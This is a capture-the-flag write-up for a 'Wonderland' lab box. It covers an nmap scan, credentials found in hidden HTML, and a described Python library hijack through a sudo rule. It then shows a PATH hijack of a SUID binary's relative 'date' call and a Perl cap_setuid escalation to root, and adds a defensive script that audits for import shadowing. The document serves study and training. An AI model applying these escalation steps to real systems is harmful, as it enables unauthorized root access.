Fall down the rabbit hole and enter wonderland. Medium difficulty.
nmap -sC -sV -T4 10.10.144.50 -oN initial.nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-15 19:29 BST
Nmap scan report for 10.10.144.50
Host is up (0.068s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_  256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.10 seconds
Starting with enumeration, there's not much to see beyond SSH and the web server. On to the web app.
Dirbusting quickly leads to this page and a folder with some images. I run them through steghide and binwalk to see if there's anything hidden inside, but don't find anything.
Further directory enumeration ends up at http://10.10.144.50/r/a/b/b/i/t/
Hidden in the HTML there's our first set of creds.
<!DOCTYPE html>
<head>
<title>Enter wonderland</title>
<link rel="stylesheet" type="text/css" href="/main.css">
</head>
<body>
<h1>Open the door and enter wonderland</h1>
<p>"Oh, you're sure to do that," said the Cat, "if you only walk long enough."</p>
<p>Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?" </p>
<p>"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving the other paw, "lives a March Hare. Visit either you like: they're both mad."</p>
<p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>
<img src="/img/alice_door.png" style="height: 50rem;">
</body>
Now logged in as Alice, sudo -l shows a potential privesc vector:
(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
The script imports random and lives in Alice's home directory, so there's potential for library hijacking: Python searches the script's own directory before the standard library, so a malicious random.py (a reverse shell) placed next to the script would be imported instead of the real module.
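As an added defensive check (not from the room or the original writeup), the script below audits a sudo-target Python script for the conditions that make this hijack possible: a script directory not owned by root or writable by others, and a module file sitting beside the script that would shadow a standard-library import. The directory, script and the empty random.py in demo() are constructed for the demo.

```python
import ast
import os
import stat
import tempfile


def imported_top_level_modules(script_path):
    """Return the top-level module names a script imports (e.g. 'random')."""
    with open(script_path, encoding="utf-8") as fh:
        tree = ast.parse(fh.read(), filename=script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)


def audit_script_dir(script_path):
    """Flag conditions under which a script run via sudo would import a planted module."""
    script_dir = os.path.dirname(os.path.abspath(script_path))
    st = os.stat(script_dir)
    findings = []
    # The interpreter puts the script's own directory at the front of sys.path,
    # so anyone who can write there can shadow every module the script imports.
    if st.st_uid != 0:
        findings.append("script directory not owned by root (uid %d): %s" % (st.st_uid, script_dir))
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("script directory is group/world writable: %s" % script_dir)
    for name in imported_top_level_modules(script_path):
        for candidate in (os.path.join(script_dir, name + ".py"),
                          os.path.join(script_dir, name, "__init__.py")):
            if os.path.exists(candidate):
                findings.append("import %r is shadowed by %s" % (name, candidate))
    return findings


def demo():
    """Constructed case: a sudo-target script beside an empty random.py in a writable dir."""
    work = tempfile.mkdtemp()
    os.chmod(work, 0o775)  # constructed: group-writable, to trigger the writable-dir finding
    script = os.path.join(work, "walrus_and_the_carpenter.py")
    with open(script, "w", encoding="utf-8") as fh:
        fh.write("import random\nprint(random.choice(['walrus', 'carpenter']))\n")
    open(os.path.join(work, "random.py"), "w").close()  # empty stand-in that shadows stdlib random
    return {"imports": imported_top_level_modules(script), "findings": audit_script_dir(script)}


if __name__ == "__main__":
    for line in demo()["findings"]:
        print(line)
```

Run it against the real sudo rule's script path on a host to see whether the same findings appear; an empty result means no shadowing module is present and the directory is root-owned and not writable by others.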
Now in Rabbit's home directory there's a SUID binary (teaParty). There's nothing on the server to inspect the binary with, so after downloading it to the attacking machine it's clear that it calls date by a relative path rather than an absolute one, which we might be able to exploit to gain another shell…
Welcome to the tea party!
The Mad Hatter will be here soon.
/bin/echo -n 'Probably by ' && date --date='next hour' -R
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)
Changing which date is found first on PATH…
rabbit@wonderland:/home/rabbit$ export PATH=$(pwd):$PATH
export PATH=$(pwd):$PATH
rabbit@wonderland:/home/rabbit$ which date
which date
/home/rabbit/date
Inside Hatter’s home directory is password.txt containing WhyIsARavenLikeAWritingDesk? which means I can kill all the shells and continue as Hatter.
There's nothing immediately obvious in Hatter's home folder, so it's time to do some basic enumeration, which shows that Perl carries the cap_setuid capability.
hatter@wonderland:/$ getcap -r / 2>/dev/null
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
So with a bit of help from GTFOBins I can escalate to root, grab root.txt from Alice's home folder, then hop into the root folder for user.txt.
The initial enumeration through the web app was silly, but I enjoyed this room: relative path abuse and Lewis Carroll quotes. I got stuck in the rabbit hole of looking for steganography early on, but thankfully there wasn't any.